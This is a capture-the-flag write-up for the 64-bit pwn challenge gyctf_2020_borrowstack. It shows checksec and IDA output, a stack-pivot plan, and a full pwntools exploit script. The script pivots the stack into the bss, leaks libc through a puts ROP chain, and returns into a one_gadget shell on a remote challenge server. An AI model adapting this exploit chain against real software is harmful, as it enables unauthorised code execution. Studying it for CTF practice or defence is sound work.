
gyctf_2020_borrowstack

Ubuntu16.04


0x01


checksec

[*] '/home/zelas/Desktop/pwn/gyctf_2020_borrowstack/gyctf_2020_borrowstack'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)

IDA

// Decompiled main() of the challenge binary (IDA output as posted).  Two reads
// from stdin: the first is a classic stack overflow, the second writes into a
// global.  Neither input is length-checked against its destination.
int __cdecl main(int argc, const char **argv, const char **envp)
{
char buf[96]; // [rsp+0h] [rbp-60h] BYREF  -- 0x60 bytes, sits directly below saved rbp

setbuf(stdin, 0LL);
setbuf(stdout, 0LL);
puts(&s);
read(0, buf, 0x70uLL); // up to 0x70 bytes into a 0x60-byte buffer: the 16 excess bytes cover saved rbp and the return address (no stack canary per checksec above)
puts("Done!You can check and use your borrow stack now!");
read(0, &bank, 0x100uLL); // second read into the global `bank`; its address is fixed because the binary is non-PIE (checksec above)
return 0;
}

0x02


思路

1.栈迁移

2.在bss上布置栈帧泄露libc

3.利用onegadget取得shell

0x03


exp

from pwn import *

# Exploit script for the gyctf_2020_borrowstack challenge (Ubuntu 16.04, libc 2.23),
# following the three steps listed above: stack pivot, libc leak from the bss
# "borrow stack", one_gadget.  It relies on the properties checksec reported:
# no PIE (fixed gadget/bss addresses) and no stack canary (plain overflow of buf).
# Either mitigation being present would break step 1.
context(os='linux', arch='amd64', log_level='debug')
path = './gyctf_2020_borrowstack'
# io = process([path])
io = remote("node4.buuoj.cn", 26449)  # challenge instance used by the author
elf = ELF(path)
libc = ELF("libc-2.23.so")  # must be the same build as the remote libc, or the offsets below are wrong

# --- Step 1: stack pivot -------------------------------------------------------
# main's first read() writes 0x70 bytes into the 0x60-byte buf (see the IDA
# listing), so the last 16 bytes overwrite saved rbp and the return address.
padding = 0x60 + 0x8  # bytes from buf[0] up to (but not including) the return address
bss = 0x601080
leave_ret = 0x400699 # leave ; ret
# saved rbp := bss, return address := leave;ret -> rsp moves to bss ("borrow stack").
payload = flat(b'a' * 0x60, bss, leave_ret)
delim1 = b'Tell me what you want\n'
io.sendafter(delim1, payload)

# --- Step 2: leak libc ---------------------------------------------------------
# The second read() places up to 0x100 bytes at &bank in the bss, which is now
# the stack, so those bytes are consumed as a ROP chain.
pop_rdi_ret = 0x400703 # pop rdi ; ret
ret = 0x4004c9 # ret
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = elf.symbols['main']
# payload1 = flat(bss+0x90, p64(ret)*22, pop_rdi_ret, puts_got, puts_plt, main)
# Layout: new rbp, a 22-entry ret sled, then puts(puts@got) and a return to main
# so the overflow in step 3 can be triggered again.
# NOTE(review): the page does not explain how the sled length was chosen —
# confirm before changing it.
payload1 = p64(bss + 0x90) + p64(ret) * 22 + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main)
delim2 = b'Done!You can check and use your borrow stack now!'
io.recvuntil(delim2)
io.send(payload1)
io.recv()  # discard output preceding the leak; NOTE(review): depends on what has arrived so far
# Leaked pointer: 6 significant bytes, the last of which is 0x7f for a typical
# 64-bit library mapping; zero-extend to 8 bytes for u64().
puts_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
print('[+] put_address', hex(puts_addr))
libc_base = puts_addr - libc.symbols['puts']
# one_gadget offsets for this libc build; the author uses index 1.
gadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
one_gadget = gadget[1] + libc_base

# --- Step 3: return into one_gadget -------------------------------------------
# Back in main, overflow buf a second time: 0x68 bytes of padding reach the
# return address and the 8-byte gadget address fits within the 0x70-byte read.
payload2 = flat(b'a'*padding, one_gadget)
io.sendline(payload2)
io.interactive()

